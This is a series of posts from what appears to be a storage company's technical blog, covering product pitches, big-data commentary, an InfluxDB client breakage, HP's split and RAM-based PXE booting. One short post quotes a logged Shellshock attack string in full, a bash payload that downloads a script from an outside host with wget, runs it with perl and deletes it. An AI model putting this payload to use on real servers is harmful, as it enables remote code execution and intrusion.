turnkey, low cost and high density 1PB usable at 20+ GB/s sustained

Fully turnkey, we’d ship a rack with everything pre-installed/configured. Some de-palletizing required, but its plug and play (power, disks) after that. More details, and a sign up to get a formal quote here.

This would be in 24U of rack space for less than $0.18/raw GB or $0.26/usable GB. Single file system name space, a single mount point. Leverages BeeGFS, and we have VMs to provide CIFS/SMB access, as well as NFS access, in addition to BeeGFS native client.

Oh, and we’ve got S3 object storage native on it as well.

How hard is it to make work:

De-palletize it, slide disks in, plug it in, turn on the manager nodes, run the external config script (via web page, console, serial port) to set up network, password, and other bits. And off you go.

What sort of usable capacity:

960TB in base configuration, scales to many 10s of PB.

What sort of performance:

~20GB/s streaming write performance, similar streaming read performance. Excellent metadata performance. Integrated flash cache for heavy IOP workloads.

What sort of network connectivity:

1GbE, 10GbE, 40GbE, FDR Infiniband. We provide an integrated 40GbE/Infiniband fabric. You may connect the fabric to your 10GbE/40GbE/Infiniband network.

But I already have storage:

No problem, you can add this on, and we have a trade in program. Contact us for more details.

But I need block based storage:

No problem, we provide high performance iSCSI/iSER/FCoE/SRP targets integrated into the unit.

But I need object based storage:

No problem, we include an S3 compatible object storage system.

Viewed 2825 times by 697 viewers

Velocity matters

For the last decade plus, the day job has been preaching that performance is an advantage, a feature you need, a technological barrier for those with both inefficient infrastructures and built in resistance to address these issues. You find the latter usually at organizations with purchasing groups that dominate the users and the business owners.

The advent of big data, (ok, this is what the second or third time around now) with data sets that have been pushing performance capabilities of infrastructure has been putting the exclamation point on this for the past few years. Big data is all about turning massive data sets into actionable intelligence, and enabling people to make use of the data that they’ve gathered.

Our argument has been and remains, the faster you can make your analytics, both the larger data sets you can analyze, and you can analyze them with more frequency (more models per unit time), and more accuracy (more sophisticated and coupled models representing a more accurate and testable set of hypotheses) you can obtain.

Our voice has been a lonely one in the wilderness for years until the Data Mining/Business Intelligence/Big data revolution was (re)born. Now, all of a sudden, we see article after article saying what we’ve been saying all along.

Here’s one at techcrunch (yes, I know, but still its an ok high level read). Written by a KPCB person, so they’ve got a built in bias as to what is important. And who is important.

But points 8 and 9 matter.

8. Data is the new competitive advantage: The promise of Big Data is its power to bring new insights to light. Improved analytics have triggered new, non-obvious ideas about how businesses operate. For instance, InsideSales.com discovered that a sales rep who calls a lead back within 5 minutes of a request for information boosts the likelihood of closing a sale by 10X. By harnessing big data sets, companies will discover patterns like this for the first time.

Well, it used to be called Data Mining. Then Business Intelligence. Now Big Data. The idea is to analyze your data, build testable hypotheses, and iterate until you have enough of a sense of how things might play out to build a set of tactics to further a bigger picture strategy. This is nothing new in one sense, but whats new is you have the ability to look at data at scale. And that starts opening up whole new vistas of inquiry.

9. Speed kills ? your competitors: Faster application performance will distinguish the winners in enterprise. Studies by Walmart and Compuware show that one additional second of latency in application delivery can decrease revenue by 10 percent. An emerging set of companies is focused on speed: Instart Logic accelerates application delivery, AppDynamics monitors and helps address application response time, and PernixData and Fusion-io leverage flash-based storage to make data delivery many times faster.

Put a different way, you need performance to be able to respond to rapidly changing conditions. Obviously KPCB is biased about which of these matter, but the point is that there are products that can help make things go faster.

And at the end of the day, the most important aspect of being able to work with and gain insight from data, is your ability to interact with the data, ask questions of the data, construct testable hypotheses, and run many tests.

Which is why Scalable Informatics matters, as the FastPath software defined appliances combine the highest performance hardware with the best and fastest software stacks for analytics.

Just an observation on this, that its nice that the market as a whole has come around to our viewpoint.

Viewed 21428 times by 2348 viewers

And the 0.8.3 InfluxDB no longer works with the InfluxDB perl module

I ran into this a few weeks ago, and am just getting around to debugging it now. Traced the code, set up a debugger and followed the path of execution, and … and …

Yup, its borked.

So, I can submit a patch or 3 against the InfluxDB code, or roll a simpler more general Time Series Data Base interface that will talk to InfluxDB. And eventually kdb+. Since I wanted to code for that as well, I am looking more seriously at the second option.

This means, in the near term, that influxdb-cli.pl is broken. I’ll work a simple interface to it via LWP or Mojo user agents, and will see what we can do from there. But the idea in the longer term is to leverage the db and analytics layer behind a common interface for us, one that won’t break (often).

Of course, the best of all possible worlds would be to figure out how to interface kdb+ as an engine for InfluxDB. It already lets you use a number of them. Had I time I might look at that. Unfortunately, we just ditched the go language from our toolchain (very long story, the language may be fine, but the environment and its ability to put it anywhere in a tree is so completely borked its not funny … even java is easier/less dumb about things), so building it could be a problem for us.

Viewed 27949 times by 2709 viewers

A good read on a bootstrapped company

Zoho makes a number of things, including a CRM, that we use. And they are bootstrapped. Like us.

There are significant market differences between us and them, but many of the things noted in the article are common truths.

  • If you don’t start with building a real company, you won’t have a real company.
  • The decisions you make when your own ass is on the line are very different from the ones you might make if its someone elses ass, and money for that matter.
  • Economies turn, and if you are not rigged to survive, that is, if you can’t function without cash infusions, you will not likely survive

That last point describes some large fraction of startups. I like the founders comments on VCs, survivorship bias, etc.

Definitely worth a read.

Viewed 28690 times by 2810 viewers

There are times

… when during a support call, we see the magnitude of the self-inflicted damage, and ask ourselves exactly why did they do this to themselves?

Today was like this.

We do what we can to protect people from the dangerous rapidly moving sharp objects underneath the hood (or boot). We abstract things, tell them not to put fingers near the spinny blades.

Yes, its a metaphor.

Today was a day of Pyrrhic victories. More like this …


Viewed 40154 times by 3591 viewers

massive unapologetic firepower part 2 … the dashboard …

For Scalable Informatics Unison product.

The whole system:

Watching writes go by:

Note the sustained 40+ GB/s. This is a single rack sinking this data, and no SSDs in the bulk data storage path.

This dashboard is part of the day job’s FastPath product.

Viewed 45625 times by 3808 viewers

HP to split up

Interesting changes in the corporate M&A or disaggregation arena. With M&A, you are looking to build market strength by acquiring valuable IP, assets, brands, names, teams, capabilities, trade secrets, special sauces, etc. You do that to make your group stronger and more capable of handling the challenges ahead.

With a disaggregation, you slice off disparate portions of the business, and set them free to pursue their own path. This is what was rumored a few weeks ago with EMC, a possible split of the federated businesses. It could make sense if the businesses have no appreciable overlap, and there is more value in separate entities than a federation. That is, if one or more of the entities is effectively prevented by internal politics from pursuing an better strategy or set of tactics, because it would rile up its federated partners.

So the latest rumor (and it may be more than a rumor at this stage) is that HP is looking to split. HP makes a little more than 20% of its revenue from printing, and 30% of its revenue from its personal systems. The rest of the business is in the enterprise systems, software, services.

This is a huge potential split. I’d guess that they realized in their discussions with EMC, that they’d have to split the organization to better focus upon the enterprise. Which to a degree explains why HP didn’t jump at the chance (though its also quite possible that EMC was asking too high a price).

Further, I’d bet that a number of others have been shopping themselves around. But an HP that isn’t focused won’t likely do anyone any good.

So this is interesting to say the least, but it raises questions on a number of things. HP has switching, servers, storage, services, etc. on the enterprise side. I am assuming all would remain. Would this disaggregated company seek to remain independent, or sell itself to someone else (say a Quanta or someone like that)? Would the PC and printing unit do something like that?

We live in interesting times.

Viewed 42868 times by 3956 viewers

Shellshock is worse than heartbleed

In part because, well, the patches don’t seem to cover all the exploits. For the gory details, look at the CVE list here. Then cut and paste the local exploits.

Even with the latest patched source, built from scratch, there are active working compromises.

With heartbleed, all we had to do was nuke keys, patch/update packages, restart machines, cross fingers.

This is worse, in that the fixes … well … don’t.

Many many years ago, I began my Unix journey on Unicos on an Cray XMP or YMP at Pittsburgh Supercomputer Center, running some code to generate MD trajectories and energies. I hated the native shell, so I pulled down tcsh, and built it. Stored it in the local small space they gave researchers. It made using the CLI tolerable.

In the late 90s I switched to bash as this is what Linux used as its default, and I was working mostly on Linux by the end of that decade.

I am thinking of switching back to tcsh (though this could be vulnerable as well, albeit to different exploits).


Viewed 36747 times by 4231 viewers

… and the shell shock attempts continue …

From (174-143-168-121.static.cloud-ips.com)

Request: '() { :;}; /bin/bash -c "wget ellrich.com/legend.txt -O /tmp/.apache;killall -9 perl;perl /tmp/.apache;rm -rf /tmp/.apache"'

Viewed 34001 times by 4350 viewers

Updated boot tech in Scalable OS (SIOS)

This has been an itch we’ve been working on scratching a few different ways, and its very much related to forgoing distro based installers.

Ok, first the back story.

One of the things that has always annoyed me about installing systems has been the fundamental fragility of the OS drive. It doesn’t matter if its RAIDed in hardware/software. Its a pathway that can fail. And when it fails, all hell breaks loose.

This has troubled me for many years, and this is why tiburon, now SIOS has been the technology we’ve developed to solve this problem.

It turns out when you solve this problem you solve many others sort of automatically. But you also create a few.

The question of balance, which set of problems you want, and how you solve them, is what matters.

For a long time, we’ve been using NFS based OS management in the Unison storage system, as well as our FastPath big data appliances. This makes creation of new appliances as simple as installation and booting the hardware or VM. In fact, we’ve done quite a bit of debugging of odd software stacks for customers in VMs like this.

But the NFS model pre-supposes a fully operational NFS server available at all times. This is doable with a fail-over model, though it provides a potential single point of failure if not implemented as a HA NFS.

The model we’ve been working towards for a long time, was a correctly functional, and complete appliance OS that ran entirely out of RAM, but PXE booted the kernel/initrd, and then possibly grabbed a full OS image.

We want to specify the OS on the PXE command line, as SIOS aka tiburon, provides a database backed mechanism for configuration, presented as a trivial web-based API. We want all the parts of this served by PXE and http.

Well, we’ve made a major step towards the full version of this last week.

root@unison:~# cat /proc/cmdline 
root=ram BOOT_DEBUG=2 rw debug verbose console=tty0 console=ttyS1,115200n8 ip=::::diskless:eth0:dhcp ipv6.disable=1 debug rootfstype=ramdisk verbose

root@unison:~# df -h
Filesystem      Size  Used Avail Use% Mounted on
rootfs          8.0G  2.5G  5.6G  31% /
udev             10M     0   10M   0% /dev
tmpfs            16M  360K   16M   3% /run
tmpfs           8.0G  2.5G  5.6G  31% /
tmpfs           5.0M     0  5.0M   0% /run/lock
tmpfs            19G     0   19G   0% /run/shm
tmpfs           4.0G     0  4.0G   0% /tmp
tmpfs           4.0G     0  4.0G   0% /var/tmp
tmpfs            16K  4.0K   12K  25% /var/lib/nfs
tmpfs           1.0M     0  1.0M   0% /data

Notice what is completely missing from the kernel boot command line. Hint, its the root=… stuff. Hell, I could even get rid of the ip=:::: bit.

The rootfstype=ramdisk currently uses a hardwired snapshot of a pre-installed file system. But the way we have this written, we can fetch a specific image by adding in something akin to


for appropriate values of $URL. The $URL can be over the high performance network, so, say, grabbing a 1GB image over a 10GbE or IB network should be pretty quick.

We could do iscsi, or FCoE, or SRP, or iSER, or … whatever we want if we want to attach an external block device, though given our concern with the extended failure domain and failure surface, we’d prefer the ramdisk boot.

We can have the system fall back to the pre-defined OS load if the rootimage fails. The booting itself can be HA.

So we can have a much simpler to set up HA http server handing images to nodes, config to nodes, as well as a redundant set of PXE servers … in a far easier to configure, at far lower cost, and far greater scalability. This will work beautifully at web scale, as all aspects of the system are fully distributable.

Couple this to our config server, and automated post boot config system, this is becoming quite exciting as a product in and of itself.

More soon, but this is quite exciting!

Viewed 35829 times by 4428 viewers

Optimization WordPress Plugins & Solutions by W3 EDGE